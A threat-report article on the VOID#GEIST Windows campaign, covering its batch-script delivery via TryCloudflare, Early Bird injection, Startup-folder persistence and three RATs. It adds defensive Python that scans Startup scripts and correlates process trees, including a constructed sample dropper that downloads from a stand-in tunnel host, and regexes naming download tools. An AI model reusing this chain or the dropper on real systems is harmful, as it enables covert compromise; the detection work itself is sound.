VOID#GEIST: The Stealthy Script Attack Taking Over Windows PCs

Cybersecurity researchers have uncovered a stealthy campaign, which they have named VOID#GEIST, that breaks into Windows computers to steal data. It is dangerous because it does not rely on the kind of malicious executable that antivirus software is trained to catch. Instead, it hides inside plain-looking command scripts and legitimate software, and its real payloads are decrypted only in memory. Once it gets a foothold, it delivers three Remote Access Trojans (RATs): XWorm, AsyncRAT, and Xeno RAT. Each one gives the attacker remote control of the machine, including its files, screen, keyboard and saved credentials.

How the Trap is Set

The attack usually starts with a phishing email. When the user clicks the link or opens the attachment, a batch script, a plain list of Windows commands, is downloaded from the internet. The download is served through TryCloudflare, Cloudflare's free tunnelling service, so the file comes from a randomly named *.trycloudflare.com subdomain. That traffic is easy to mistake for ordinary use of a reputable content-delivery provider, and the attackers never have to register a domain or expose a server of their own.

What makes VOID#GEIST sneaky is that it never tries to escalate privileges or write to protected system locations. Everything runs with the normal permissions of the user who is already logged in, so there is no UAC prompt and none of the alerts that an attempt to gain administrator rights would trigger; it blends in with ordinary office work. To keep the victim from noticing, the script opens Google Chrome in full-screen mode on a decoy PDF, such as an invoice or a bill. While the user is looking at the document, the rest of the chain runs in the background.

Hiding in Plain Sight Using “Fileless” Tricks

Instead of writing a large, recognisable executable to disk, VOID#GEIST is largely "fileless": the malicious code is decrypted and run only in memory (RAM), so on-disk scanning finds nothing that looks like malware. The researchers found that the loader uses Early Bird APC injection. In this technique the attacker starts a legitimate Windows program, here explorer.exe, the process that draws the desktop and folder windows, in a suspended state, queues an asynchronous procedure call (APC) pointing at the injected code onto its main thread, and then resumes it. Because the APC runs before the program's own entry point, and before many security products have finished hooking the new process, the hidden code executes first, under the name of a trusted process.

To survive a reboot, the malware drops a small script into the user's Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup). This is a deliberately low-key form of persistence: it needs no administrator rights, touches no services, scheduled tasks or registry Run keys, and so trips none of the alarms that security tools raise for those changes. The script simply runs the next time the user logs in and starts the whole chain again.
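The Startup-folder script is the easiest place to catch this chain at rest. The Python below is an added example written for this article, not code from the researchers or from the campaign: it scans a Startup folder for batch and script files and reports download-cradle indicators matching the behaviour described above. The indicator patterns (TryCloudflare URLs, curl/certutil/PowerShell download commands, python.org fetches, Chrome launched with --kiosk or --start-fullscreen on a PDF, a python.exe under a user-writable directory) are my assumptions about what such a script would contain, and the batch text embedded in it is constructed, not a real sample.

```python
"""Triage scripts in a Windows Startup folder for download-cradle indicators.

Added example for this article; not code from the researchers or the campaign.
The indicator patterns are assumptions modelled on the described behaviour and
the sample batch text below is constructed, not a real sample.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Optional

# Script types worth reading; .lnk shortcuts are binary and only flagged for review.
SCRIPT_SUFFIXES = {".bat", ".cmd", ".vbs", ".js", ".ps1"}

# Indicator label -> case-insensitive regex over the script text (assumptions).
INDICATORS = {
    "trycloudflare_url": re.compile(r"https?://[a-z0-9.-]*trycloudflare\.com", re.I),
    "download_cradle": re.compile(
        r"\b(curl|certutil|bitsadmin|wget|iwr|Invoke-WebRequest|Start-BitsTransfer)\b", re.I),
    "python_org_fetch": re.compile(r"python\.org/ftp/python/", re.I),
    # Chrome opened full-screen on a PDF on the same command line (the decoy).
    "chrome_fullscreen_decoy": re.compile(
        r"chrome(\.exe)?\"?\s+.*--(kiosk|start-fullscreen).*\.pdf", re.I),
    # A python.exe living under a user-writable profile directory.
    "python_from_user_dir": re.compile(
        r"(%APPDATA%|%LOCALAPPDATA%|%TEMP%|%PUBLIC%)[^\s\"']*python\d*\.exe", re.I),
}


def scan_script_text(text: str) -> list[str]:
    """Return the labels of every indicator that matches the script text."""
    return [label for label, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(text: str, min_hits: int = 2) -> bool:
    """Two or more independent indicators in one Startup script is worth a ticket."""
    return len(scan_script_text(text)) >= min_hits


def default_startup_folder() -> Optional[Path]:
    """Per-user Startup folder; %APPDATA% only exists on Windows."""
    appdata = os.environ.get("APPDATA")
    if not appdata:
        return None
    return Path(appdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"


def scan_startup_folder(folder: Optional[Path] = None) -> dict[str, list[str]]:
    """Map each flagged file name in the folder to its indicator labels."""
    folder = folder if folder is not None else default_startup_folder()
    findings: dict[str, list[str]] = {}
    if folder is None or not folder.is_dir():
        return findings
    for entry in folder.iterdir():
        suffix = entry.suffix.lower()
        if suffix == ".lnk":
            findings[entry.name] = ["shortcut_review_manually"]
        elif suffix in SCRIPT_SUFFIXES:
            hits = scan_script_text(entry.read_text(errors="replace"))
            if hits:
                findings[entry.name] = hits
    return findings


# Constructed sample modelled on the chain described above (not a real sample;
# the subdomain and the Python version are made up).
SAMPLE_BATCH = r'''@echo off
curl -s -o "%TEMP%\inv.pdf" https://four-random-words.trycloudflare.com/inv.pdf
start "" "C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk "%TEMP%\inv.pdf"
curl -s -o "%APPDATA%\py.zip" https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip
"%APPDATA%\py\python.exe" "%APPDATA%\py\runn.py"
'''

# Constructed benign script: mapping a drive at logon should not be flagged.
BENIGN_BATCH = r'''@echo off
net use S: \\fileserver\share /persistent:no
'''


def demo() -> dict[str, list[str]]:
    """Write both constructed samples into a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "update.bat").write_text(SAMPLE_BATCH)
        (folder / "mapdrives.bat").write_text(BENIGN_BATCH)
        return scan_startup_folder(folder)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {', '.join(hits)}")
```

Run it with no arguments on a Windows host and it scans the current user's Startup folder; the threshold of two indicators in is_suspicious keeps a lone curl in a legitimate logon script from paging anyone, while the five hits on the constructed sample show how loud this particular dropper is once you read the file rather than trusting its extension.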

The Python Payload and the Triple Threat

One of the more interesting aspects of the attack is how much of it is done with legitimate tools. The malware downloads a real, working copy of the Python interpreter straight from the official python.org site. By bringing its own runtime it does not depend on what is installed on the victim's machine, and antivirus has no reason to flag the interpreter, because it is the genuine product. The only malicious part is the script it is told to run.

Inside this environment a script named "runn.py" does the work. It reads encrypted payload files, which carry no recognisable signature while they sit on disk, decrypts them in memory and launches them. The attack unfolds in stages, like a nesting doll:

  • First, it launches XWorm, a versatile RAT used for stealing passwords and taking screenshots.

  • Next, it abuses "AppInstallerPythonRedirector.exe", a genuine Microsoft-signed binary shipped with the App Installer package, to launch Xeno RAT under a trusted name.

  • Finally, it deploys AsyncRAT, which lets the operators watch and control what the victim does in real time.

By the end, the attackers have three independent ways of controlling the computer. The chain also sends a short "ping" (a beacon) to the attackers' command-and-control server to confirm that the infection succeeded. Because the attack is split into many small steps that each look harmless on their own (a batch file, a browser window, a Python download, a Microsoft-signed binary), security tools that judge each event in isolation rarely see the whole picture until it is too late. Catching it means correlating the steps: which process launched which, from where, and with what arguments.
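As an added example (not from the write-up or the researchers), the Python below shows the kind of correlation that last sentence calls for: it tags individual process-creation events with heuristics modelled on the chain described on this page, then walks the process tree from every script launched out of the Startup folder and only alerts when several distinct stages appear under the same root. The event records are constructed to mimic Sysmon Event ID 1 fields; the PIDs, paths, the version string in the WindowsApps path and the specific heuristics are assumptions, and real telemetry would need tuning.

```python
"""Correlate process-creation events into a VOID#GEIST-style chain.

Added example for this article, not code from the write-up or the researchers.
Fields mirror Sysmon Event ID 1 (ProcessCreate). Every event below is
constructed test data; the heuristics are assumptions modelled on the
behaviour described in the text.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# Directories a standard user can write to; a python.exe here is not a normal install.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
# Parents from which AppInstallerPythonRedirector.exe is normally run (a user typing "python").
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def tag_event(ev: ProcEvent, parent: Optional[ProcEvent]) -> list[str]:
    """Heuristic labels for one event, judged on its own plus its parent's image."""
    name, img, cmd = _basename(ev.image), ev.image.lower(), ev.cmdline.lower()
    pname = _basename(parent.image) if parent else ""
    tags = []
    if name == "cmd.exe" and STARTUP_DIR in cmd:
        tags.append("startup_folder_script")
    if name == "chrome.exe" and ("--kiosk" in cmd or "--start-fullscreen" in cmd) and ".pdf" in cmd:
        tags.append("fullscreen_pdf_decoy")
    if name.startswith("python") and name.endswith(".exe") and any(d in img for d in USER_WRITABLE):
        tags.append("python_from_user_dir")
    # Process-creation telemetry does not show CREATE_SUSPENDED or the queued APC;
    # the observable side effect of Early Bird here is explorer.exe with a Python parent.
    if name == "explorer.exe" and pname.startswith("python"):
        tags.append("explorer_spawned_by_python")
    if name == "appinstallerpythonredirector.exe" and pname not in INTERACTIVE_SHELLS:
        tags.append("redirector_unusual_parent")
    return tags


def correlate(events: list[ProcEvent], min_tags: int = 3) -> list[dict]:
    """Alert on each Startup-folder script whose process subtree shows >= min_tags stages."""
    by_pid = {e.pid: e for e in events}
    children: dict[int, list[int]] = defaultdict(list)
    for e in events:
        children[e.ppid].append(e.pid)
    tags = {e.pid: tag_event(e, by_pid.get(e.ppid)) for e in events}

    alerts = []
    for root in events:
        if "startup_folder_script" not in tags[root.pid]:
            continue
        collected, seen, stack = set(), set(), [root.pid]
        while stack:                      # depth-first walk of the root's descendants
            pid = stack.pop()
            if pid in seen:
                continue
            seen.add(pid)
            collected.update(tags[pid])
            stack.extend(children[pid])
        if len(collected) >= min_tags:
            alerts.append({"root_pid": root.pid, "cmdline": root.cmdline, "tags": sorted(collected)})
    return alerts


# Constructed events (PIDs, paths and the WindowsApps version string are invented).
STARTUP = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Malicious chain: the logon shell runs the dropped Startup script ...
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", rf'cmd.exe /c "{STARTUP}\update.bat"'),
    ProcEvent(201, 200, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"chrome.exe" --kiosk "C:\Users\alice\AppData\Local\Temp\invoice.pdf"'),
    ProcEvent(202, 200, r"C:\Users\alice\AppData\Roaming\py\python.exe",
              r'"C:\Users\alice\AppData\Roaming\py\python.exe" runn.py'),
    ProcEvent(203, 202, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(204, 202, r"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_0.0.0.0_x64__example\AppInstallerPythonRedirector.exe",
              "AppInstallerPythonRedirector.exe"),
    # Benign: a different Startup script that only maps a drive.
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", rf'cmd.exe /c "{STARTUP}\mapdrives.bat"'),
    ProcEvent(301, 300, r"C:\Windows\System32\net.exe", r"net use S: \\fileserver\share"),
]


def run_sample() -> list[dict]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(f"root pid {alert['root_pid']}: {alert['cmdline']}\n  stages: {', '.join(alert['tags'])}")
```

The design point is in correlate: none of the five tags is an alert on its own (a Startup batch file, a kiosk-mode Chrome, a portable Python and the Store redirector all have legitimate uses), but three or more of them hanging off the same Startup-launched cmd.exe is the "big picture" that per-event rules miss. The benign mapdrives.bat subtree collects one tag and stays quiet.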
